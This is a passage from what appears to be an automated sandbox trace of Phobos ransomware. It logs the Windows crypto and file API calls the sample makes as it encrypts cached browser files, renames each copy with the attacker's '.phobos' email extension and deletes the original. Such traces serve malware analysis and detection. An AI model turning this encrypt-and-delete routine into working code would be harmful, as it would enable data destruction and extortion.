halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\fallback_728x90[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.677] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.677] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.677] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7f78, lpOverlapped=0x0) returned 1 [0176.713] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7f80, dwBufLen=0x7f80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7f80) returned 1 [0176.713] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7f80, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7f80, lpOverlapped=0x0) returned 1 [0176.753] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0176.753] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.753] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0176.753] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.753] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0176.754] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.754] CloseHandle (hObject=0x148) returned 1 [0176.754] CloseHandle (hObject=0x178) returned 1 [0176.754] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\fallback_728x90[1].jpg")) returned 1 [0176.758] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\plusone[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\plusone[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.765] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=40754) returned 1 [0176.765] CloseHandle (hObject=0x178) returned 1 [0176.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\plusone[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\plusone[1].js")) returned 0x2020 [0176.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\plusone[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\plusone[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\plusone[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\plusone[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.765] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.765] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\plusone[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\plusone[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.766] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.766] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.766] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x9f32, lpOverlapped=0x0) returned 1 [0176.794] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9f40, dwBufLen=0x9f40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9f40) returned 1 [0176.794] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x9f40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x9f40, lpOverlapped=0x0) returned 1 [0176.809] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0176.809] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.809] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.809] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.809] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.809] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.809] CloseHandle (hObject=0x178) returned 1 [0176.809] CloseHandle (hObject=0x148) returned 1 [0176.810] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\plusone[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\plusone[1].js")) returned 1 [0176.811] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\WebCore.4.19.0.ltr.light.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\webcore.4.19.0.ltr.light.min[1].css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.811] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5767) returned 1 [0176.811] CloseHandle (hObject=0x148) returned 1 [0176.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\WebCore.4.19.0.ltr.light.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\webcore.4.19.0.ltr.light.min[1].css")) returned 0x2020 [0176.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\WebCore.4.19.0.ltr.light.min[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\webcore.4.19.0.ltr.light.min[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\WebCore.4.19.0.ltr.light.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\webcore.4.19.0.ltr.light.min[1].css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.812] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.812] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\WebCore.4.19.0.ltr.light.min[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\webcore.4.19.0.ltr.light.min[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.812] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.812] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.812] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1687, lpOverlapped=0x0) returned 1 [0176.827] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1690, dwBufLen=0x1690 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1690) returned 1 [0176.827] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1690, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1690, lpOverlapped=0x0) returned 1 [0176.828] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0176.828] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.828] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0176.828] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.828] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0176.828] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.828] CloseHandle (hObject=0x148) returned 1 [0176.828] CloseHandle (hObject=0x178) returned 1 [0176.828] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\WebCore.4.19.0.ltr.light.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\webcore.4.19.0.ltr.light.min[1].css")) returned 1 [0176.829] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\1223855322-postmessagerelay[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.862] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10537) returned 1 [0176.863] CloseHandle (hObject=0x158) returned 1 [0176.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\1223855322-postmessagerelay[1].js")) returned 0x2020 [0176.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\1223855322-postmessagerelay[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\1223855322-postmessagerelay[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.863] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.863] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\1223855322-postmessagerelay[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.864] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0176.864] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.864] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2929, lpOverlapped=0x0) returned 1 [0176.872] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2930, dwBufLen=0x2930 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2930) returned 1 [0176.872] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2930, lpOverlapped=0x0) returned 1 [0176.873] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0176.873] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.873] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0176.873] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.873] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0176.873] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.873] CloseHandle (hObject=0x158) returned 1 [0176.873] CloseHandle (hObject=0x194) returned 1 [0176.873] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\1223855322-postmessagerelay[1].js")) returned 1 [0176.874] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa3e1oo[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.875] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=667) returned 1 [0176.875] CloseHandle (hObject=0x194) returned 1 [0176.875] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa3e1oo[1].png")) returned 0x2020 [0176.875] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa3e1oo[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa3e1oo[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.875] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.875] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa3e1oo[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.875] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0176.875] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.875] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x29b, lpOverlapped=0x0) returned 1 [0176.887] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0) returned 1 [0176.887] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2a0, lpOverlapped=0x0) returned 1 [0176.888] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0176.888] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.888] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.888] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.888] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.888] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.888] CloseHandle (hObject=0x194) returned 1 [0176.889] CloseHandle (hObject=0x158) returned 1 [0176.889] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa3e1oo[1].png")) returned 1 [0176.889] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet 